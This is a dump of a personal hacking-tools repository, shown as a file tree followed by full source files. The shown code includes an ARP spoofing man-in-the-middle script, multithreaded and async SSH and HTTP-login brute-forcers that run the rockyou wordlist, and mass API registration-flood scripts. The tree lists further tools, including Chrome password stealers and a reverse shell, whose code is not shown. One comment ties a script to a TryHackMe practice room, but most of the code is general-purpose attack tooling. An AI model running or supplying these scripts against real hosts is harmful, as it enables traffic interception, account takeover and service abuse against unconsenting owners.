├── .gitignore ├── arp_spoof.py ├── attacks ├── api-bruteforce.py ├── async_api_bruteforce.py ├── async_ssh_bruteforce.py ├── http_form_bruteforce.py ├── ssh_bruteforce.py ├── ssh_bruteforce_v2.py └── ssh_bruteforce_v3.py ├── bluetooth ├── ble-enum.py └── bluetooth-enum.py ├── code_injector.py ├── dependencies └── requirements-2.7.txt ├── dns_spoof.py ├── dos_api.py ├── encryption └── aes256-cipher │ └── aes-cipher.py ├── execute_and_report.py ├── mac_changer.py ├── net_cut.py ├── network_ping.py ├── network_scanner.py ├── packet_sniffer.py ├── parsers ├── curl_parser.py └── ffuf-translatory.py ├── playbook.md ├── post-connection ├── README.md ├── legacy │ └── mac-chrome_passwords.py ├── mac_chrome_password.py └── win-chrome_passwords.py ├── readme.md ├── recon ├── local_network_scan.py ├── mysql_enum.py ├── smb-check-access.py └── smtp_enum.py ├── replace_download.py ├── reset.sh ├── reverse-shells └── pickle-rev-base64.py ├── scapy.md ├── sslstrip_proxy.sh ├── stress_testing ├── readme.md ├── tcp_flood.py ├── tcp_syn_flood.py └── udp_flood.py ├── util ├── __init__.py ├── combine_wordlist.py ├── fakeprofile-generator.py ├── mac_network_interfaces.py ├── network_interfaces.py └── randomize_mac.py ├── verbose-network-scanner.resp ├── web-penetration ├── directories.txt ├── domain-crawler.py ├── extract_form.py ├── path-crawler.py ├── post.py ├── spider.py └── subdomains.txt ├── web ├── bruteforce.py └── curl.sh └── xss-scanner ├── async-scanner.py ├── docs └── xss-scanner.gif ├── legacy └── form-extract.py ├── readme.md ├── requirements.txt └── scanner.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | share/python-wheels/ 24 | *.egg-info/ 25 | .installed.cfg 26 | *.egg 27 | MANIFEST 28 | 29 | # PyInstaller 30 | # Usually these files are written by a python script from a template 31 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 32 | *.manifest 33 | *.spec 34 | 35 | # Installer logs 36 | pip-log.txt 37 | pip-delete-this-directory.txt 38 | 39 | # Unit test / coverage reports 40 | htmlcov/ 41 | .tox/ 42 | .nox/ 43 | .coverage 44 | .coverage.* 45 | .cache 46 | nosetests.xml 47 | coverage.xml 48 | *.cover 49 | *.py,cover 50 | .hypothesis/ 51 | .pytest_cache/ 52 | cover/ 53 | 54 | # Translations 55 | *.mo 56 | *.pot 57 | 58 | # Django stuff: 59 | *.log 60 | local_settings.py 61 | db.sqlite3 62 | db.sqlite3-journal 63 | 64 | # Flask stuff: 65 | instance/ 66 | .webassets-cache 67 | 68 | # Scrapy stuff: 69 | .scrapy 70 | 71 | # Sphinx documentation 72 | docs/_build/ 73 | 74 | # PyBuilder 75 | .pybuilder/ 76 | target/ 77 | 78 | # Jupyter Notebook 79 | .ipynb_checkpoints 80 | 81 | # IPython 82 | profile_default/ 83 | ipython_config.py 84 | 85 | # pyenv 86 | # For a library or package, you might want to ignore these files since the code is 87 | # intended to run in multiple environments; otherwise, check them in: 88 | # .python-version 89 | 90 | # pipenv 91 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 92 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 93 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 94 | # install all needed dependencies. 95 | #Pipfile.lock 96 | 97 | # poetry 98 | # Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control. 99 | # This is especially recommended for binary packages to ensure reproducibility, and is more 100 | # commonly ignored for libraries. 101 | # https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control 102 | #poetry.lock 103 | 104 | # pdm 105 | # Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control. 106 | #pdm.lock 107 | # pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it 108 | # in version control. 109 | # https://pdm.fming.dev/#use-with-ide 110 | .pdm.toml 111 | 112 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm 113 | __pypackages__/ 114 | 115 | # Celery stuff 116 | celerybeat-schedule 117 | celerybeat.pid 118 | 119 | # SageMath parsed files 120 | *.sage.py 121 | 122 | # Environments 123 | .env 124 | .venv 125 | env/ 126 | venv/ 127 | ENV/ 128 | env.bak/ 129 | venv.bak/ 130 | 131 | # Spyder project settings 132 | .spyderproject 133 | .spyproject 134 | 135 | # Rope project settings 136 | .ropeproject 137 | 138 | # mkdocs documentation 139 | /site 140 | 141 | # mypy 142 | .mypy_cache/ 143 | .dmypy.json 144 | dmypy.json 145 | 146 | # Pyre type checker 147 | .pyre/ 148 | 149 | # pytype static type analyzer 150 | .pytype/ 151 | 152 | # Cython debug symbols 153 | cython_debug/ 154 | 155 | # PyCharm 156 | # JetBrains specific template is maintained in a separate JetBrains.gitignore that can 157 | # be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore 158 | # and can be added to the global gitignore or merged into this file. For a more nuclear 159 | # option (not recommended) you can uncomment the following to ignore the entire idea folder. 160 | #.idea/ -------------------------------------------------------------------------------- /arp_spoof.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import scapy.all as scapy 4 | import time 5 | import sys 6 | import subprocess 7 | import optparse 8 | 9 | #target_ip="10.0.2.6" 10 | #gateway_ip = "10.0.2.1" 11 | 12 | def get_arguments(): 13 | parser = optparse.OptionParser() 14 | parser.add_option('-t', '--target', dest="target_ip", 15 | help=' Specify target IP Address ') 16 | parser.add_option('-g', '--gateway', dest="gateway_ip", 17 | help=' Specify gateway IP, Try route -n') 18 | (options, arguments) = parser.parse_args() 19 | if not options.target_ip: 20 | parser.error("[-] Please Specify target IP, use --help") 21 | if not options.gateway_ip: 22 | parser.error("[-] Please Specify gateway IP, use --help") 23 | # For improvement add auto value in route -n 24 | return options 25 | 26 | def get_mac(ip): 27 | arp_request = scapy.ARP(pdst=ip) 28 | broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") # 34. Combining Frames Review 29 | arp_request_broadcast = broadcast/arp_request 30 | answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0] # this returns two list; answered and unanswered 31 | return answered_list[0][1].hwsrc 32 | 33 | def spoof(target_ip, spoof_ip): 34 | target_mac = get_mac(target_ip) 35 | packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip ) 36 | # print(packet.show()) 37 | # print(packet.summary()) 38 | scapy.send(packet, verbose=False) 39 | 40 | def restore(destination_ip, source_ip): 41 | destination_mac = get_mac(destination_ip) 42 | source_mac = get_mac(source_ip) 43 | packet = scapy.ARP(op=2, pdst= destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac) 44 | scapy.send(packet, count=4, verbose=False) 45 | 46 | try: 47 | subprocess.call("echo 1 > /proc/sys/net/ipv4/ip_forward ", shell=True) 48 | sent_packets_counts = 0 49 | options = get_arguments() 50 | 51 | target_ip = options.target_ip 52 | gateway_ip = options.gateway_ip 53 | 54 | while True: 55 | spoof(target_ip, gateway_ip) 56 | spoof(gateway_ip, target_ip) 57 | sent_packets_counts = sent_packets_counts + 2 58 | print("\r[+] Packets Sent : {}".format(str(sent_packets_counts))), 59 | sys.stdout.flush() 60 | time.sleep(2) 61 | 62 | except KeyboardInterrupt: 63 | print("[+] Detected Keyboard Interupt .... Resetting ARP Tables") 64 | restore(target_ip, gateway_ip) 65 | restore(gateway_ip, target_ip) 66 | print("[+] ARP tables are setted back from before") 67 | -------------------------------------------------------------------------------- /attacks/api-bruteforce.py: -------------------------------------------------------------------------------- 1 | from multiprocessing import Pool 2 | import requests 3 | import json 4 | import time 5 | 6 | url = "https://api.target.io/api/register" 7 | 8 | def f(i): 9 | payload = { 10 | "email": f"demo_attack+{i}@email.com", 11 | "username": f"attacker{i}" 12 | } 13 | 14 | headers = { 15 | 'Content-Type': "application/json", 16 | 'User-Agent': "PostmanRuntime/7.13.0", 17 | 'Accept': "*/*", 18 | 'Connection': "keep-alive", 19 | 'cache-control': "no-cache" 20 | } 21 | 22 | response = requests.post(url, data=json.dumps(payload), headers=headers) 23 | # Needs to be .txt, as json() will make an error if the server choked 24 | print(i, response.text) 25 | 26 | return response 27 | 28 | 29 | def main(number_of_request): 30 | p = Pool(16) 31 | return p.map(f, range(number_of_request)) 32 | 33 | 34 | if __name__ == '__main__': 35 | start_time = time.time() 36 | number_of_request = 1000 37 | print(f"[+] {number_of_request} Requests") 38 | result = str(main(number_of_request)) 39 | print("--- %s seconds ---" % (time.time() - start_time)) 40 | 41 | success = result.count("20") 42 | server = result.count("50") 43 | error = result.count("40") 44 | 45 | print("success: ", success) 46 | print("server errors: ", server) 47 | print("client errors: ", error) 48 | -------------------------------------------------------------------------------- /attacks/async_api_bruteforce.py: -------------------------------------------------------------------------------- 1 | import aiohttp 2 | import asyncio 3 | import time 4 | import json 5 | 6 | """ 7 | v1.0.1 8 | testedin python 3.10.6 9 | pip3 install aiohttp 10 | """ 11 | 12 | url = "https://api.target.io/api/register" 13 | number_of_requests = 500 14 | concurrent_limit = 500 # adjust based on your system's capability 15 | 16 | async def post(session, i): 17 | payload = { 18 | "email": f"demo_atk+{i}@email.com", 19 | "password": "s3cur3_th1s_sh1t" 20 | } 21 | 22 | headers = { 23 | 'Content-Type': "application/json", 24 | 'User-Agent': "PostmanRuntime/7.13.0", 25 | 'Accept': "*/*", 26 | 'Connection': "keep-alive", 27 | 'cache-control': "no-cache" 28 | } 29 | 30 | try: 31 | async with session.post(url, data=json.dumps(payload), headers=headers) as response: 32 | print(i, response.status, await response.text()) 33 | return response.status 34 | 35 | except Exception as e: 36 | print(f"Request failed: {e}") 37 | return None 38 | 39 | async def main(): 40 | tasks = [] 41 | async with aiohttp.ClientSession() as session: 42 | for i in range(number_of_requests): 43 | task = asyncio.ensure_future(post(session, i)) 44 | tasks.append(task) 45 | responses = await asyncio.gather(*tasks) 46 | return responses 47 | 48 | if __name__ == "__main__": 49 | start_time = time.time() 50 | print(f"[+] {number_of_requests} Requests") 51 | responses = asyncio.run(main()) 52 | print("--- %s seconds ---" % (time.time() - start_time)) 53 | 54 | success = len([r for r in responses if r and r // 100 == 2]) 55 | server = len([r for r in responses if r and r // 100 == 5]) 56 | error = len([r for r in responses if r and r // 100 == 4]) 57 | 58 | print("success: ", success) 59 | print("server errors: ", server) 60 | print("client errors: ", error) 61 | -------------------------------------------------------------------------------- /attacks/async_ssh_bruteforce.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import asyncio 3 | import asyncssh 4 | import aiofiles 5 | 6 | """ 7 | pip3 install asyncio asyncssh aiofiles 8 | """ 9 | 10 | async def ssh_attempt(semaphore, user, host, password): 11 | async with semaphore: 12 | try: 13 | async with asyncssh.connect(host, username=user, password=password) as conn: 14 | print(f"[+] Successful login to {host} \nuser: {user} \npassword: {password}") 15 | sys.exit(0) 16 | except Exception as e: 17 | print(f"[-] Authentication failed {user} : {password}") 18 | 19 | async def main(): 20 | if len(sys.argv) != 3: 21 | print("Usage: python async_ssh_bruteforce.py ") 22 | return 23 | 24 | user = sys.argv[1] 25 | host = sys.argv[2] 26 | CONCURRENCY_LIMIT = 100 27 | 28 | semaphore = asyncio.Semaphore(CONCURRENCY_LIMIT) 29 | 30 | password_list="/usr/share/wordlists/rockyou.txt" 31 | 32 | async with aiofiles.open(password_list, mode="r", encoding='latin-1') as f: 33 | async for line in f: 34 | password = line.strip() 35 | await ssh_attempt(semaphore, user, host, password) 36 | 37 | if __name__ == "__main__": 38 | asyncio.run(main()) 39 | -------------------------------------------------------------------------------- /attacks/http_form_bruteforce.py: -------------------------------------------------------------------------------- 1 | # import aiohttp 2 | # import asyncio 3 | # import time 4 | # import json 5 | # import os 6 | 7 | # """ 8 | # v1.0.1 9 | # testedin python 3.10.6 10 | # pip3 install aiohttp 11 | # """ 12 | 13 | # async def post(session, index, FUZZ, filter, semaphore): 14 | # # payload = {"email": f"demo_atk+{i}@email.com", "password": "s3cur3_th1s_sh1t"} 15 | # payload = { 16 | # '__VIEWSTATE': 'FtDWXBorgd5PnS3Zm/OOFb8G6Z+z2Di8+D6C2nXaT0BXEV77JRgpiq0q4001bzaa1xC9v1tu0/eGq7NVZPeYx+rPqeBIUqcVJ5jflfJ6itd1+jhXLZQ/vl8xJBL355kPh4lIx6Bl8b+Uj6EV7eNFRo5k0V9CnfiEjXF64Dt7AzovFM5b', 17 | # '__EVENTVALIDATION': 'WdQGNjnu0klLhxIo2w/iePIaOG7I6V4l/dJujt8W5v5HUCOWh68wRWrYoiMhQw1SK5jE/bSl+bj0ptVZ1Iq4eoV/5WlyvRLnmJ/kEXa7S8CyBGEUisnGk1u0rXPd/zQhXbzFNQHnRYefaH3240eaNeKrgUR+iyALg9mq63v+/PlaUQzn', 18 | # 'ctl00$MainContent$LoginUser$UserName': 'admin', 19 | # 'ctl00$MainContent$LoginUser$Password': FUZZ, 20 | # 'ctl00$MainContent$LoginUser$LoginButton': 'Log in', 21 | # } 22 | 23 | # headers = { 24 | # 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0', 25 | # 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 26 | # 'Accept-Language': 'en-US,en;q=0.5', 27 | # # 'Accept-Encoding': 'gzip, deflate', 28 | # 'Content-Type': 'application/x-www-form-urlencoded', 29 | # 'Origin': 'http://10.10.151.23', 30 | # 'Connection': 'keep-alive', 31 | # 'Referer': 'http://10.10.151.23/Account/login.aspx?ReturnURL=%2fadmin%2f', 32 | # 'Upgrade-Insecure-Requests': '1', 33 | # 'Priority': 'u=1', 34 | # } 35 | # async with semaphore: 36 | # try: 37 | # async with session.post( 38 | # # url, data=json.dumps(payload), headers=headers 39 | # url, data=payload, headers=headers # Use Dictionary if 'Content-Type': 'application/x-www-form-urlencoded', 40 | 41 | # ) as response: 42 | # #print(i, response.status, await response.text()) 43 | # text = await response.text() 44 | 45 | # if filter in text: 46 | # response.status = 401 47 | # status = 'Failed ' 48 | # else: 49 | # status = 'CHECK THIS!' 50 | # print(text) 51 | # print(f"FUZZ: {FUZZ}") 52 | # exit(1) 53 | 54 | # print(index, response.status, status) 55 | 56 | # return response.status 57 | 58 | # except Exception as e: 59 | # print(f"[-] Request failed: {e}") 60 | # return None 61 | 62 | 63 | 64 | 65 | # def read_file_to_array(file_path): 66 | # # Expand the ~ to the full path 67 | # expanded_path = os.path.expanduser(file_path) 68 | 69 | # try: 70 | # with open(expanded_path, 'r', encoding='latin-1') as file: # Using 'latin-1' encoding 71 | # lines = file.readlines() 72 | # return [line.strip() for line in lines] 73 | # except Exception as e: 74 | # print(f"Error reading file: {e}") 75 | # return [] 76 | 77 | # async def main(number_of_requests=1000): 78 | # file_path = "~/wordlists/rockyou.txt" 79 | # # file_path = "~/wordlists/test.txt" 80 | # password_list = read_file_to_array(file_path) 81 | # filter_string = "Login failed" 82 | # concurrent_limit = 50 # adjust based on your system's capability 83 | # semaphore = asyncio.Semaphore(concurrent_limit) 84 | 85 | # tasks = [] 86 | # async with aiohttp.ClientSession() as session: 87 | # for i in range(len(password_list)): 88 | # task = asyncio.ensure_future(post( 89 | # session=session, index=i ,FUZZ=password_list[i], filter=filter_string,semaphore=semaphore 90 | # )) 91 | # tasks.append(task) 92 | # responses = await asyncio.gather(*tasks) 93 | # return responses 94 | 95 | 96 | # if __name__ == "__main__": 97 | # # url = "http://192.168.254.109:2368/" 98 | # url = "http://10.10.151.23/Account/login.aspx?ReturnURL=%2fadmin%2f" 99 | # number_of_requests = 1000 100 | 101 | 102 | # start_time = time.time() 103 | # print(f"[+] {number_of_requests} Requests") 104 | # responses = asyncio.run(main()) 105 | # print("--- %s seconds ---" % (time.time() - start_time)) 106 | 107 | # success = len([r for r in responses if r and r // 100 == 2]) 108 | # server = len([r for r in responses if r and r // 100 == 5]) 109 | # error = len([r for r in responses if r and r // 100 == 4]) 110 | 111 | # print("success: ", success) 112 | # print("server errors: ", server) 113 | # print("client errors: ", error) 114 | 115 | """ 116 | THIS VERSION IS WORKING BUT IT TAKES TOO LONG 117 | the script is taking a long time to print anything because it's waiting for all tasks to complete before printing the results 118 | """ 119 | 120 | 121 | # ============================================================================================================ 122 | # VERSION 2 123 | # ============================================================================================================ 124 | # import aiohttp 125 | # import asyncio 126 | # import time 127 | # import os 128 | 129 | # """ 130 | # v1.0.1 131 | # tested in python 3.10.6 132 | # pip3 install aiohttp 133 | # """ 134 | 135 | # async def post(session, index, FUZZ, filter, semaphore): 136 | # payload = { 137 | # '__VIEWSTATE': 'FtDWXBorgd5PnS3Zm/OOFb8G6Z+z2Di8+D6C2nXaT0BXEV77JRgpiq0q4001bzaa1xC9v1tu0/eGq7NVZPeYx+rPqeBIUqcVJ5jflfJ6itd1+jhXLZQ/vl8xJBL355kPh4lIx6Bl8b+Uj6EV7eNFRo5k0V9CnfiEjXF64Dt7AzovFM5b', 138 | # '__EVENTVALIDATION': 'WdQGNjnu0klLhxIo2w/iePIaOG7I6V4l/dJujt8W5v5HUCOWh68wRWrYoiMhQw1SK5jE/bSl+bj0ptVZ1Iq4eoV/5WlyvRLnmJ/kEXa7S8CyBGEUisnGk1u0rXPd/zQhXbzFNQHnRYefaH3240eaNeKrgUR+iyALg9mq63v+/PlaUQzn', 139 | # 'ctl00$MainContent$LoginUser$UserName': 'admin', 140 | # 'ctl00$MainContent$LoginUser$Password': FUZZ, 141 | # 'ctl00$MainContent$LoginUser$LoginButton': 'Log in', 142 | # } 143 | 144 | # headers = { 145 | # 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0', 146 | # 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 147 | # 'Accept-Language': 'en-US,en;q=0.5', 148 | # 'Content-Type': 'application/x-www-form-urlencoded', 149 | # 'Origin': 'http://10.10.151.23', 150 | # 'Connection': 'keep-alive', 151 | # 'Referer': 'http://10.10.151.23/Account/login.aspx?ReturnURL=%2fadmin%2f', 152 | # 'Upgrade-Insecure-Requests': '1', 153 | # 'Priority': 'u=1', 154 | # } 155 | 156 | # async with semaphore: 157 | # try: 158 | # async with session.post(url, data=payload, headers=headers) as response: 159 | # text = await response.text() 160 | # if filter in text: 161 | # response.status = 401 162 | # status = 'Failed' 163 | # else: 164 | # status = 'CHECK THIS!' 165 | # print(text) 166 | # print(f"FUZZ: {FUZZ}") 167 | # exit(1) 168 | 169 | # print(index, response.status, status) 170 | # return response.status 171 | # except Exception as e: 172 | # print(f"[-] Request failed: {e}") 173 | # return None 174 | 175 | # def read_file_to_array(file_path): 176 | # expanded_path = os.path.expanduser(file_path) 177 | # try: 178 | # with open(expanded_path, 'r', encoding='latin-1') as file: 179 | # lines = file.readlines() 180 | # return [line.strip() for line in lines] 181 | # except Exception as e: 182 | # print(f"Error reading file: {e}") 183 | # return [] 184 | 185 | # async def main(number_of_requests=1000): 186 | # file_path = "~/wordlists/rockyou.txt" 187 | # password_list = read_file_to_array(file_path) 188 | # filter_string = "Login failed" 189 | # concurrent_limit = 50 190 | # semaphore = asyncio.Semaphore(concurrent_limit) 191 | 192 | # tasks = [] 193 | # async with aiohttp.ClientSession() as session: 194 | # for i in range(len(password_list)): 195 | # task = asyncio.ensure_future(post(session=session, index=i, FUZZ=password_list[i], filter=filter_string, semaphore=semaphore)) 196 | # tasks.append(task) 197 | 198 | # for task in asyncio.as_completed(tasks): 199 | # response = await task 200 | # if response and response // 100 == 2: 201 | # print("Success:", response) 202 | # elif response and response // 100 == 5: 203 | # print("Server error:", response) 204 | # elif response and response // 100 == 4: 205 | # print("Client error:", response) 206 | 207 | # if __name__ == "__main__": 208 | # url = "http://10.10.151.23/Account/login.aspx?ReturnURL=%2fadmin%2f" 209 | # number_of_requests = 1000 210 | 211 | # start_time = time.time() 212 | # print(f"[+] {number_of_requests} Requests") 213 | # asyncio.run(main()) 214 | # print("--- %s seconds ---" % (time.time() - start_time)) 215 | """ 216 | works but still slow 217 | """ 218 | 219 | # ============================================================================================================ 220 | # VERSION 3 221 | # ============================================================================================================ 222 | import aiohttp 223 | import asyncio 224 | import time 225 | import os 226 | 227 | """ 228 | v1.0.1 229 | tested in python 3.10.6 230 | pip3 install aiohttp 231 | """ 232 | 233 | async def post(session, index, FUZZ, filter, semaphore): 234 | """ 235 | in your browser inspect element, then get the request and copy it as curl. 236 | then go to https://curlconverter.com/python/ 237 | 238 | get the body and the headers, replace the previous below 239 | """ 240 | payload = { 241 | '__VIEWSTATE': 'FtDWXBorgd5PnS3Zm/OOFb8G6Z+z2Di8+D6C2nXaT0BXEV77JRgpiq0q4001bzaa1xC9v1tu0/eGq7NVZPeYx+rPqeBIUqcVJ5jflfJ6itd1+jhXLZQ/vl8xJBL355kPh4lIx6Bl8b+Uj6EV7eNFRo5k0V9CnfiEjXF64Dt7AzovFM5b', 242 | '__EVENTVALIDATION': 'WdQGNjnu0klLhxIo2w/iePIaOG7I6V4l/dJujt8W5v5HUCOWh68wRWrYoiMhQw1SK5jE/bSl+bj0ptVZ1Iq4eoV/5WlyvRLnmJ/kEXa7S8CyBGEUisnGk1u0rXPd/zQhXbzFNQHnRYefaH3240eaNeKrgUR+iyALg9mq63v+/PlaUQzn', 243 | 'ctl00$MainContent$LoginUser$UserName': 'admin', 244 | 'ctl00$MainContent$LoginUser$Password': FUZZ, 245 | 'ctl00$MainContent$LoginUser$LoginButton': 'Log in', 246 | } 247 | 248 | headers = { 249 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0', 250 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 251 | 'Accept-Language': 'en-US,en;q=0.5', 252 | 'Content-Type': 'application/x-www-form-urlencoded', 253 | 'Origin': 'http://10.10.151.23', 254 | 'Connection': 'keep-alive', 255 | 'Referer': 'http://10.10.151.23/Account/login.aspx?ReturnURL=%2fadmin%2f', 256 | 'Upgrade-Insecure-Requests': '1', 257 | 'Priority': 'u=1', 258 | } 259 | """ 260 | HTTP FORMS 261 | 'Content-Type': 'application/x-www-form-urlencoded', 262 | should use dictionary as payload 263 | """ 264 | 265 | async with semaphore: 266 | try: 267 | async with session.post(url, data=payload, headers=headers) as response: 268 | text = await response.text() 269 | if filter in text: 270 | response.status = 401 271 | status = 'Failed' 272 | else: 273 | status = 'CHECK THIS!' 274 | print(text) 275 | print(f"FUZZ: {FUZZ}") 276 | os._exit(1) # Exit the program immediately 277 | 278 | print(index, response.status, status) 279 | return response.status 280 | except Exception as e: 281 | print(f"[-] Request failed: {e}") 282 | return None 283 | 284 | def read_file_to_array(file_path): 285 | expanded_path = os.path.expanduser(file_path) 286 | try: 287 | with open(expanded_path, 'r', encoding='latin-1') as file: 288 | lines = file.readlines() 289 | return [line.strip() for line in lines] 290 | except Exception as e: 291 | print(f"Error reading file: {e}") 292 | return [] 293 | 294 | async def main(): 295 | file_path = "~/wordlists/rockyou.txt" 296 | password_list = read_file_to_array(file_path) 297 | filter_string = "Login failed" 298 | concurrent_limit = 50 299 | semaphore = asyncio.Semaphore(concurrent_limit) 300 | 301 | tasks = [] 302 | async with aiohttp.ClientSession() as session: 303 | for i in range(0, len(password_list), concurrent_limit): 304 | batch = password_list[i:i + concurrent_limit] 305 | for j, password in enumerate(batch): 306 | task = asyncio.ensure_future(post( 307 | session=session, index=i + j, FUZZ=password, filter=filter_string, semaphore=semaphore 308 | )) 309 | tasks.append(task) 310 | 311 | responses = await asyncio.gather(*tasks) 312 | # for response in responses: 313 | # if response: 314 | # if response // 100 == 2: 315 | # print("Success:", response) 316 | # elif response // 100 == 5: 317 | # print("Server error:", response) 318 | # elif response // 100 == 4: 319 | # print("Client error:", response) 320 | tasks = [] # Clear tasks for the next batch 321 | 322 | if __name__ == "__main__": 323 | # https://tryhackme.com/r/room/hackpark 324 | # this is the room we tried this 325 | url = "http://10.10.151.23/Account/login.aspx?ReturnURL=%2fadmin%2f" 326 | 327 | start_time = time.time() 328 | print("[+] Starting requests") 329 | asyncio.run(main()) 330 | print("--- %s seconds ---" % (time.time() - start_time)) 331 | -------------------------------------------------------------------------------- /attacks/ssh_bruteforce.py: -------------------------------------------------------------------------------- 1 | import paramiko 2 | import sys 3 | 4 | def ssh_attempt(user, host, password): 5 | client = paramiko.SSHClient() 6 | 7 | try: 8 | # Automatically add the host key 9 | client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 10 | client.connect(host, username=user, password=password) 11 | 12 | print(f"[+] Successful login to {host} \nuser: {user} \npassword: {password}") 13 | exit(0) 14 | except paramiko.AuthenticationException: 15 | print(f"[-] Authentication failed {user} : {password}") 16 | except paramiko.SSHException as e: 17 | print(f"SSH error occurred: {str(e)}") 18 | finally: 19 | client.close() 20 | 21 | def main(): 22 | if len(sys.argv) != 3: 23 | print("Usage: python ssh.py ") 24 | return 25 | 26 | user = sys.argv[1] 27 | host = sys.argv[2] 28 | 29 | password_list="/usr/share/wordlists/rockyou.txt" 30 | with open(password_list, "r", encoding='latin-1' ) as f: 31 | passwords = f.read().splitlines() 32 | 33 | for password in passwords: 34 | ssh_attempt(user, host, password) 35 | 36 | if __name__ == "__main__": 37 | main() 38 | -------------------------------------------------------------------------------- /attacks/ssh_bruteforce_v2.py: -------------------------------------------------------------------------------- 1 | import paramiko 2 | import sys 3 | from concurrent.futures import ThreadPoolExecutor 4 | import time 5 | 6 | """" 7 | pip3 install paramiko 8 | """ 9 | 10 | def ssh_attempt(user, host, password): 11 | client = paramiko.SSHClient() 12 | client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 13 | try: 14 | client.connect(host, username=user, password=password) 15 | print(f"[+] Successful login to {host} \nuser: {user} \npassword: {password}") 16 | exit(0) 17 | except EOFError: 18 | print("[-] Connection reset by peer, waiting before retrying...") 19 | time.sleep(1) # wait for 1 second 20 | # optionally, you can retry the connection here 21 | # not yet working properly 22 | 23 | except paramiko.AuthenticationException: 24 | print(f"[-] Authentication failed {user} : {password}") 25 | # print(f"\r[-] Authentication failed {user} : {password}", end="\r") 26 | 27 | except paramiko.SSHException as e: 28 | print(f"SSH error occurred: {str(e)}") 29 | 30 | 31 | finally: 32 | client.close() 33 | 34 | def main(): 35 | if len(sys.argv) != 3: 36 | print("Usage: python ssh-bruteforce.py ") 37 | return 38 | 39 | user = sys.argv[1] 40 | host = sys.argv[2] 41 | # password_list = "rockyou.txt" 42 | password_list = "passwords.txt" 43 | 44 | # Read the passwords into a list 45 | with open(password_list, "r", encoding='latin-1') as f: 46 | passwords = f.read().splitlines() 47 | 48 | # Set the number of threads 49 | # threads = 20 # too fast 50 | # threads = 10 # risky 51 | threads = 7 # safe but fast 52 | # hydra only recommends 4 53 | 54 | 55 | try: 56 | # Create a thread pool and map the ssh_attempt function to each password 57 | with ThreadPoolExecutor(max_workers=threads) as executor: 58 | executor.map(lambda password: ssh_attempt(user, host, password), passwords) 59 | except KeyboardInterrupt: 60 | print("Interrupted by user, shutting down...") 61 | exit(0) 62 | 63 | if __name__ == "__main__": 64 | main() 65 | -------------------------------------------------------------------------------- /attacks/ssh_bruteforce_v3.py: -------------------------------------------------------------------------------- 1 | import paramiko 2 | import sys 3 | from concurrent.futures import ThreadPoolExecutor 4 | import time 5 | 6 | def ssh_attempt(user, host, password, index, total_passwords): 7 | percentage = (index / total_passwords) * 100 8 | print(f"Trying ({index} out of {total_passwords}) {percentage:.2f}%") 9 | 10 | client = paramiko.SSHClient() 11 | client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 12 | try: 13 | client.connect(host, username=user, password=password) 14 | print(f"[+] Successful login to {host} \nuser: {user} \npassword: {password}") 15 | exit(0) 16 | except EOFError: 17 | print("[-] Connection reset by peer, waiting before retrying...") 18 | time.sleep(1) 19 | except paramiko.AuthenticationException: 20 | print(f"[-] {password} failed") 21 | except paramiko.SSHException as e: 22 | print(f"SSH error occurred: {str(e)}") 23 | finally: 24 | client.close() 25 | 26 | def main(): 27 | if len(sys.argv) != 3: 28 | print("Usage: python ssh-bruteforce.py ") 29 | return 30 | 31 | user = sys.argv[1] 32 | host = sys.argv[2] 33 | #password_list = "rockyou.txt" 34 | password_list = "passwords.txt" 35 | 36 | with open(password_list, "r", encoding='latin-1') as f: 37 | passwords = f.read().splitlines() 38 | 39 | total_passwords = len(passwords) 40 | threads = 7 41 | 42 | try: 43 | with ThreadPoolExecutor(max_workers=threads) as executor: 44 | for index, password in enumerate(passwords, start=1): 45 | executor.submit(ssh_attempt, user, host, password, index, total_passwords) 46 | except KeyboardInterrupt: 47 | print("Interrupted by user, shutting down...") 48 | exit(0) 49 | 50 | if __name__ == "__main__": 51 | main() 52 | -------------------------------------------------------------------------------- /bluetooth/ble-enum.py: -------------------------------------------------------------------------------- 1 | # bluetooth low energy scan 2 | from bluetooth.ble import DiscoveryService 3 | 4 | service = DiscoveryService() 5 | devices = service.discover(2) 6 | 7 | for address, name in devices.items(): 8 | print("name: {}, address: {}".format(name, address)) -------------------------------------------------------------------------------- /bluetooth/bluetooth-enum.py: -------------------------------------------------------------------------------- 1 | import bluetooth 2 | 3 | """ 4 | # ==================================== 5 | # PRE-REQUISITES 6 | sudo apt install -y \ 7 | libbluetooth-dev \ 8 